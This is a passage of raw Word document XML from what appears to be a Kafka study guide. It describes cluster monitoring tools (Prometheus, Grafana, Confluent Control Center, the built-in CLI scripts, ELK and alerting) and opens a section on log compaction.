    </w:p>
    <w:p w14:paraId="6C2D2BE0" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumer fetch requests, fetch response times, consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF91934" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Broker resource utilization, disk I/O, number of partitions, under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48A367" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Grafana Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once Prometheus collects Kafka metrics, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create dashboards that provide a visual overview of Kafka’s health. Grafana offers pre-configured dashboards specifically for Kafka, which include metrics such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B17326" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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roker Status</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the health of each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B2C48" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows the lag of consumer groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE97D4" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks messages produced and consumed per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22137968" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Grafana can also be used to set up alerts based on predefined thresholds, notifying you of potential issues in your Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60255901" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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5. Confluent Control Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D46D7B" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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For users of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Kafka</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Confluent Control Center</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a commercial tool designed to monitor and manage Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778D3A9" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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ey Features of Confluent Control Center:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515CDB47" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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al-time Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks Kafka cluster health, producer/consumer performance, and topic status in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255074F" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Topic Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitors replication across partitions and ensures that there are no under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43065DB5" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Lag Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks consumer lag for each consumer group and alerts when the lag exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645B3E8" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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etrics and Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offers pre-built dashboards for Kafka monitoring, including metrics like throughput, replication status, and consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B13AC3E" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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fluent Control Center also provides advanced features such as data quality monitoring, schema validation, and audit logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC37BA5" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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6. Kafka’s Built-In Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B60D3" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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includes several built-in command-line tools that can be used for basic monitoring and troubleshooting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E7077" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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afka-topics.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists topics, shows partition information, and helps in managing topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD8210" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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topics.sh --zookeeper &lt;zk-server&gt; --describe --topic &lt;topic-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D36AF7" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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lastRenderedPageBreak/>
        <w:t>kafka-consumer-groups.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays consumer group information, including offsets and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB66AF" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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consumer-groups.sh --bootstrap-server &lt;kafka-broker&gt; --describe --group &lt;group-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F496C" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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afka-broker-api-versions.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the Kafka API versions supported by brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290AC32" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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broker-api-versions.sh --bootstrap-server &lt;kafka-broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432ACC96" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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ese tools provide useful information for on-the-spot checks, but they are more suited for troubleshooting rather than continuous monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF768D6" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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7. System Monitoring Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7DCB7C" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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n addition to the Kafka-specific tools, system-level monitoring tools can be used to monitor the underlying hardware and resources used by Kafka brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4238C" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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PU and Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor how much CPU and memory Kafka brokers are consuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0480FC" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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isk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka relies heavily on disk I/O for storing logs, so it’s important to monitor disk usage and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D51631" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Network Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Track network traffic between brokers, producers, and consumers, especially when dealing with large amounts of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC13D0D" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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ools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Node Exporter</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Collectd</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Datadog</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Zabbix</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to gather system-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650011A" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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8. Log Aggregation and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36471312" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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logs contain important information about the status and health of the cluster. By aggregating Kafka logs with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can analyze logs in real-time to detect errors or warnings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB35E19" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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ogstash</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can collect and aggregate logs from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DC6A3" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores logs and allows querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A4817" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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ibana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> visualizes log data, providing insights into issues like broker failures, replication problems, and other anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C4AFB" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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9. Alerting Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F757AF7" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Alertmanager</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Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Slack</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration, you can set up alerting mechanisms that notify you when certain thresholds are breached, such as high consumer lag, under-replicated partitions, or high resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB3244" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4410F" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="00CE4B95" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitoring Kafka requires a combination of different tools and techniques, ranging from JMX metrics, Kafka Manager, and Burrow to Prometheus/Grafana and Confluent Control Center. These tools provide real-time insights into Kafka's performance, helping you detect and resolve issues proactively. Effective monitoring ensures that your Kafka cluster remains healthy, performant, and scalable as your system grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A6D86" w14:textId="5A1C1FE2" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C54169">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6CCB8C0F">
          <v:rect id="_x0000_i3165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E89A07" w14:textId="273C6BD4" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="003C01E6" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="789" w:name="_Toc196308269"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kafka’s log compaction feature</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="789"/>
    </w:p>
    <w:p w14:paraId="07CAA57D" w14:textId="3F9BA139" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00DF0B8A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Log Compaction Feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B66B5" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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afka Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature that allows Kafka to retain only the latest version of a record for each key in a topic, which helps manage disk usage and reduces the volume of stored data while still maintaining the ability to retrieve the most recent value for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DFED5D" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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ey Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA21128" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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og Compaction vs. Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
